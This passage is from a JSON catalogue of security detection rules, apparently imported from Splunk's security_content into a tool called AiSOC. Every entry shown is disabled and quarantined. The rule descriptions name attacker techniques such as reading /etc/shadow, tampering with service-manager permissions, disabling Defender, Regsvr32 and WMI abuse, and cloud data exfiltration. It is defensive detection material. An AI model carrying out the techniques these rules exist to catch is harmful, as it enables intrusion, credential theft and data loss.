agents, specifically searching for any process execution involving the \"sc.exe\" binary with the \"sdset\" flag targeting the \"scmanager\" service. 
If confirmed malicious, this could allow an attacker to escalate their privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-scmanager-security-descriptor-tampering-via-sc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04023928-0381-4935-82cb-03372b2ef644", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_scmanager_security_descriptor_tampering_via_sc_exe.yml" } }, { "id": "splunk-security-content-0418e72f-e710-4867-b656-0688e1523e09", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Scan On Update", "description": "The following analytic detects modifications to the Windows registry that disable the Windows Defender Scan On Update feature. It leverages data from the Endpoint.Registry datamodel, specifically looking for changes to the \"DisableScanOnUpdate\" registry setting with a value of \"0x00000001\". This activity is significant because disabling automatic scans can leave systems vulnerable to malware and other threats. 
If confirmed malicious, this action could allow attackers to bypass Windows Defender, facilitating further compromise and persistence within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-scan-on-update.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0418e72f-e710-4867-b656-0688e1523e09", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_scan_on_update.yml" } }, { "id": "splunk-security-content-0419cb7a-57ea-467b-974f-77c303dfe2a3", "type": "detection", "name": "Linux Auditd Possible Access To Credential Files", "description": "The following analytic detects attempts to access or dump the contents of /etc/passwd and /etc/shadow files on Linux systems. It leverages data from Linux Auditd, focusing on processes like 'cat', 'nano', 'vim', and 'vi' accessing these files. This activity is significant as it may indicate credential dumping, a technique used by adversaries to gain persistence or escalate privileges. 
If confirmed malicious, attackers could obtain hashed passwords for offline cracking, leading to unauthorized access and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-access-to-credential-files.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0419cb7a-57ea-467b-974f-77c303dfe2a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_access_to_credential_files.yml" } }, { "id": "splunk-security-content-04207f8a-e08d-4ee6-be26-1e0c4488b04a", "type": "detection", "name": "PowerShell Start or Stop Service", "description": "The following analytic identifies the use of PowerShell's Start-Service or Stop-Service cmdlets on an endpoint. It leverages PowerShell Script Block Logging to detect these commands. This activity is significant because attackers can manipulate services to disable or stop critical functions, causing system instability or disrupting business operations. 
If confirmed malicious, this behavior could allow attackers to disable security services, evade detection, or disrupt essential services, leading to potential system downtime and compromised security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-start-or-stop-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04207f8a-e08d-4ee6-be26-1e0c4488b04a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_start_or_stop_service.yml" } }, { "id": "splunk-security-content-042a3d32-8318-4763-9679-09db2644a8f2", "type": "detection", "name": "Kubernetes AWS detect suspicious kubectl calls", "description": "The following analytic detects anonymous and unauthenticated requests to a Kubernetes cluster. It identifies this behavior by monitoring API calls from users who have not provided any token or password in their request, using data from `kube_audit` logs. This activity is significant for a SOC as it indicates a severe misconfiguration, allowing unfettered access to the cluster with no traceability. 
If confirmed malicious, an attacker could gain access to sensitive data or control over the cluster, posing a substantial security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-aws-detect-suspicious-kubectl-calls.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "042a3d32-8318-4763-9679-09db2644a8f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_aws_detect_suspicious_kubectl_calls.yml" } }, { "id": "splunk-security-content-04430b4e-5ca8-4e88-98b5-d6bcf54f8393", "type": "detection", "name": "HTTP Scripting Tool User Agent", "description": "This Splunk query analyzes web access logs to identify and categorize non-browser user agents, detecting various types of security tools, scripting languages, automation frameworks, and suspicious patterns. 
This activity can signify malicious actors attempting to interact with web endpoints in non-standard ways.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-scripting-tool-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04430b4e-5ca8-4e88-98b5-d6bcf54f8393", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/http_scripting_tool_user_agent.yml" } }, { "id": "splunk-security-content-04455dd3-ced7-480f-b8e6-5469b99e98e2", "type": "detection", "name": "AWS Exfiltration via Batch Service", "description": "The following analytic identifies the creation of AWS Batch jobs that could potentially abuse the AWS Bucket Replication feature on S3 buckets. It leverages AWS CloudTrail logs to detect the `JobCreated` event, analyzing job details and their status. This activity is significant because attackers can exploit this feature to exfiltrate data by creating malicious batch jobs. 
If confirmed malicious, this could lead to unauthorized data transfer between S3 buckets, resulting in data breaches and loss of sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-batch-service.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "04455dd3-ced7-480f-b8e6-5469b99e98e2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_batch_service.yml" } }, { "id": "splunk-security-content-0470c8e7-dd8d-420f-8302-073e8a2b66f0", "type": "detection", "name": "Windows Executable Masquerading as Benign File Types", "description": "The following analytic detects the presence of executable files masquerading as benign file types on Windows systems. 
Adversaries employ this technique to evade defenses and trick users into executing malicious code by renaming executables with extensions commonly associated with documents, images, or other non-executable formats (e.g., .pdf, .jpg, .doc, .png).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-executable-masquerading-as-benign-file-types.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0470c8e7-dd8d-420f-8302-073e8a2b66f0", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_executable_masquerading_as_benign_file_types.yml" } }, { "id": "splunk-security-content-0488e814-eb81-42c3-9f1f-b2244973e3a3", "type": "detection", "name": "Azure AD New MFA Method Registered", "description": "The following analytic detects the registration of a new Multi-Factor Authentication (MFA) method for a user account in Azure Active Directory. It leverages Azure AD audit logs to identify changes in MFA configurations. This activity is significant because adding a new MFA method can indicate an attacker's attempt to maintain persistence on a compromised account. If confirmed malicious, the attacker could bypass existing security measures, solidify their access, and potentially escalate privileges, access sensitive data, or make unauthorized changes. 
Immediate verification and remediation are required to secure the affected account.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-new-mfa-method-registered.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0488e814-eb81-42c3-9f1f-b2244973e3a3", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_new_mfa_method_registered.yml" } }, { "id": "splunk-security-content-0562ad4b-fdaa-4882-b12f-7b8e0034cd72", "type": "detection", "name": "Windows Odbcconf Hunting", "description": "The following analytic identifies the execution of Odbcconf.exe within the environment. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events where the process name is Odbcconf.exe. This activity is significant because Odbcconf.exe can be used by attackers to execute arbitrary commands or load malicious DLLs, potentially leading to code execution or persistence. 
If confirmed malicious, this behavior could allow an attacker to maintain access to the system, execute further malicious activities, or escalate privileges, posing a significant threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-odbcconf-hunting.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0562ad4b-fdaa-4882-b12f-7b8e0034cd72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_odbcconf_hunting.yml" } }, { "id": "splunk-security-content-05c4b09f-ea28-4c7c-a7aa-a246f665c8a2", "type": "detection", "name": "AWS Exfiltration via DataSync Task", "description": "The following analytic detects the creation of an AWS DataSync task, which could indicate potential data exfiltration. It leverages AWS CloudTrail logs to identify the `CreateTask` event from the DataSync service. This activity is significant because attackers can misuse DataSync to transfer sensitive data from a private AWS location to a public one, leading to data compromise. 
If confirmed malicious, this could result in unauthorized access to sensitive information, causing severe data breaches and compliance violations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1119" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-exfiltration-via-datasync-task.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "05c4b09f-ea28-4c7c-a7aa-a246f665c8a2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_exfiltration_via_datasync_task.yml" } }, { "id": "splunk-security-content-064cd09f-1ff4-4823-97e0-45c2f5b087ec", "type": "detection", "name": "Windows Modify Registry MaxConnectionPerServer", "description": "The following analytic identifies a suspicious modification of the Windows registry setting for max connections per server. It detects changes to specific registry paths using data from the Endpoint.Registry datamodel. This activity is significant because altering this setting can be exploited by attackers to increase the number of concurrent connections to a remote server, potentially facilitating DDoS attacks or enabling more effective lateral movement within a compromised network. 
If confirmed malicious, this could lead to network disruption or further compromise of additional systems.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-maxconnectionperserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "064cd09f-1ff4-4823-97e0-45c2f5b087ec", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_maxconnectionperserver.yml" } }, { "id": "splunk-security-content-065f2701-b7ea-42f5-9ec4-fbc2261165f9", "type": "detection", "name": "Windows AD add Self to Group", "description": "This analytic detects instances where a user adds themselves to an Active Directory (AD) group. This activity is a common indicator of privilege escalation, where a user attempts to gain unauthorized access to higher privileges or sensitive resources. 
By monitoring AD logs, this detection identifies such suspicious behavior, which could be part of a larger attack strategy aimed at compromising critical systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-add-self-to-group.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "065f2701-b7ea-42f5-9ec4-fbc2261165f9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_add_self_to_group.yml" } }, { "id": "splunk-security-content-0661c2de-93de-11ec-9833-acde48001122", "type": "detection", "name": "Windows WMI Process Call Create", "description": "The following analytic detects the execution of WMI command lines used to create or execute processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line events that include specific keywords like \"process,\" \"call,\" and \"create.\" This activity is significant because adversaries often use WMI to execute malicious payloads on local or remote hosts, potentially bypassing traditional security controls. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or maintain persistence within the environment, posing a severe threat to organizational security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-wmi-process-call-create.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0661c2de-93de-11ec-9833-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_wmi_process_call_create.yml" } }, { "id": "splunk-security-content-06ade821-f6fa-40d0-80af-15bc1d45b3ba", "type": "detection", "name": "Windows Exfiltration Over C2 Via Invoke RestMethod", "description": "The following analytic detects potential data exfiltration using PowerShell's Invoke-RestMethod. It leverages PowerShell Script Block Logging to identify scripts that attempt to upload files via HTTP POST requests. This activity is significant as it may indicate an attacker is exfiltrating sensitive data, such as desktop screenshots or files, to an external command and control (C2) server. If confirmed malicious, this could lead to data breaches, loss of sensitive information, and further compromise of the affected systems. 
Immediate investigation is recommended to determine the intent and scope of the activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-exfiltration-over-c2-via-invoke-restmethod.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "06ade821-f6fa-40d0-80af-15bc1d45b3ba", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_exfiltration_over_c2_via_invoke_restmethod.yml" } }, { "id": "splunk-security-content-06b23921-bfe2-4576-89dd-616f06e129da", "type": "detection", "name": "O365 Exfiltration via File Download", "description": "The following analytic detects when an excessive number of files are downloaded from o365 by the same user over a short period of time. O365 may bundle these files together as a ZIP file; however, each file will have its own download event. This behavior may indicate an attacker staging data for exfiltration or an insider threat removing organizational data. 
Additional attention should be taken with any Azure Guest (#EXT#) accounts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1567", "T1530" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-exfiltration-via-file-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "06b23921-bfe2-4576-89dd-616f06e129da", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_exfiltration_via_file_download.yml" } }, { "id": "splunk-security-content-06b8ec9a-d3b5-4882-8f16-04b4d10f5eab", "type": "detection", "name": "Azure AD User Consent Blocked for Risky Application", "description": "The following analytic detects instances where Azure AD has blocked a user's attempt to grant consent to a risky or potentially malicious application. This detection leverages Azure AD audit logs, focusing on user consent actions and system-driven blocks. Monitoring these blocked consent attempts is crucial as it highlights potential threats early on, indicating that a user might be targeted or that malicious applications are attempting to infiltrate the organization. 
If confirmed malicious, this activity suggests that Azure's security measures successfully prevented a harmful application from accessing organizational data, warranting immediate investigation to understand the context and take preventive measures.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-user-consent-blocked-for-risky-application.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "06b8ec9a-d3b5-4882-8f16-04b4d10f5eab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_user_consent_blocked_for_risky_application.yml" } }, { "id": "splunk-security-content-07052556-d4b5-4bae-89aa-cbdc1bb11250", "type": "detection", "name": "Linux Auditd Disable Or Modify System Firewall", "description": "The following analytic detects suspicious disabling or modification of the system firewall. This behavior is critical for a SOC to monitor because it may indicate attempts to gain unauthorized access or maintain control over a system. Such actions could be signs of malicious activity. If confirmed, this could lead to serious consequences, including a compromised system, unauthorized access to sensitive data, or even a wider breach affecting the entire network. 
Detecting and responding to these signs early is essential to prevent potential security incidents.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-disable-or-modify-system-firewall.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07052556-d4b5-4bae-89aa-cbdc1bb11250", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_disable_or_modify_system_firewall.yml" } }, { "id": "splunk-security-content-070e9b80-6252-11eb-ae93-0242ac130002", "type": "detection", "name": "Detect Regsvr32 Application Control Bypass", "description": "The following analytic identifies the abuse of Regsvr32.exe to proxy execution of malicious code, specifically detecting the loading of \"scrobj.dll\" by Regsvr32.exe. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process creation events and command-line executions. This activity is significant because Regsvr32.exe is a trusted, signed Microsoft binary, often used in \"Squiblydoo\" attacks to bypass application control mechanisms. 
If confirmed malicious, this technique could allow an attacker to execute arbitrary code, potentially leading to system compromise and persistent access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.010" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regsvr32-application-control-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "070e9b80-6252-11eb-ae93-0242ac130002", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regsvr32_application_control_bypass.yml" } }, { "id": "splunk-security-content-0734bd21-2769-4972-a5f1-78bb1e011224", "type": "detection", "name": "PowerShell Invoke WmiExec Usage", "description": "The following analytic detects the execution of the Invoke-WMIExec utility within PowerShell Script Block Logging (EventCode 4104). This detection leverages PowerShell script block logs to identify instances where the Invoke-WMIExec command is used. Monitoring this activity is crucial as it indicates potential lateral movement using WMI commands with NTLMv2 pass-the-hash authentication. 
If confirmed malicious, this activity could allow an attacker to execute commands remotely on target systems, potentially leading to further compromise and lateral spread within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-invoke-wmiexec-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "0734bd21-2769-4972-a5f1-78bb1e011224", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_invoke_wmiexec_usage.yml" } }, { "id": "splunk-security-content-073e69d0-68b2-4142-aa90-a7ee6f590676", "type": "detection", "name": "Windows Modify Registry wuStatusServer", "description": "The following analytic identifies suspicious modifications to the Windows Update configuration registry, specifically targeting the WUStatusServer key. It leverages data from the Endpoint datamodel to detect changes in the registry path associated with Windows Update settings. This activity is significant as it is commonly used by adversaries, including malware like RedLine Stealer, to bypass detection and deploy additional payloads. 
If confirmed malicious, this modification could allow attackers to evade defenses, potentially leading to further system compromise and persistent unauthorized access.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-wustatusserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "073e69d0-68b2-4142-aa90-a7ee6f590676", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_wustatusserver.yml" } }, { "id": "splunk-security-content-07921114-6db4-4e2e-ae58-3ea8a52ae93f", "type": "detection", "name": "Detect Regasm with Network Connection", "description": "The following analytic detects the execution of regasm.exe establishing a network connection to a public IP address, excluding private IP ranges. This detection leverages Sysmon EventID 3 logs to identify such behavior. This activity is significant as regasm.exe is a legitimate Microsoft-signed binary that can be exploited to bypass application control mechanisms. 
If confirmed malicious, this behavior could indicate an adversary's attempt to establish a remote Command and Control (C2) channel, potentially leading to privilege escalation and further malicious actions within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.009" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-regasm-with-network-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07921114-6db4-4e2e-ae58-3ea8a52ae93f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_regasm_with_network_connection.yml" } }, { "id": "splunk-security-content-07c0d28a-9a9b-409f-8d4b-65355bd19ead", "type": "detection", "name": "ESXi Lockdown Mode Disabled", "description": "This detection identifies when Lockdown Mode is disabled on an ESXi host, which can indicate that a threat actor is attempting to weaken host security controls. 
Disabling Lockdown Mode allows broader remote access via SSH or the host client and may precede further malicious actions such as data exfiltration, lateral movement, or VM tampering.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-lockdown-mode-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07c0d28a-9a9b-409f-8d4b-65355bd19ead", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_lockdown_mode_disabled.yml" } }, { "id": "splunk-security-content-07c36cda-6567-43c3-bc1a-89dff61e2cd9", "type": "detection", "name": "Cisco IOS XE Implant Access", "description": "The following analytic identifies the potential exploitation of the Cisco IOS XE vulnerability, CVE-2023-20198, in the Web User Interface.\nIt monitors POST requests to the \"/webui/logoutconfirm.html?logon_hash=*\" endpoint using the Web datamodel.\nThis activity can be significant as it indicates a potential access request to the implant.\nIf confirmed malicious, attackers could maintain privileged access, compromising the device's integrity and security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": 
"detections/splunk-imports/_quarantine/cisco-ios-xe-implant-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07c36cda-6567-43c3-bc1a-89dff61e2cd9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/cisco_ios_xe_implant_access.yml" } }, { "id": "splunk-security-content-07e08a12-870c-11eb-b5f9-acde48001122", "type": "detection", "name": "Clop Ransomware Known Service Name", "description": "The following analytic identifies the creation of a service with a known name used by CLOP ransomware for persistence and high-privilege code execution. It detects this activity by monitoring Windows Event Logs (EventCode 7045) for specific service names (\"SecurityCenterIBM\", \"WinCheckDRVs\"). This activity is significant because the creation of such services is a common tactic used by ransomware to maintain control over infected systems. 
If confirmed malicious, this could allow attackers to execute code with elevated privileges, maintain persistence, and potentially disrupt or encrypt critical data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/clop-ransomware-known-service-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "07e08a12-870c-11eb-b5f9-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/clop_ransomware_known_service_name.yml" } }, { "id": "splunk-security-content-07eed200-03f5-11ec-98fb-acde48001122", "type": "detection", "name": "Gsuite Suspicious Shared File Name", "description": "The following analytic detects shared files in Google Drive with suspicious filenames commonly used in spear phishing 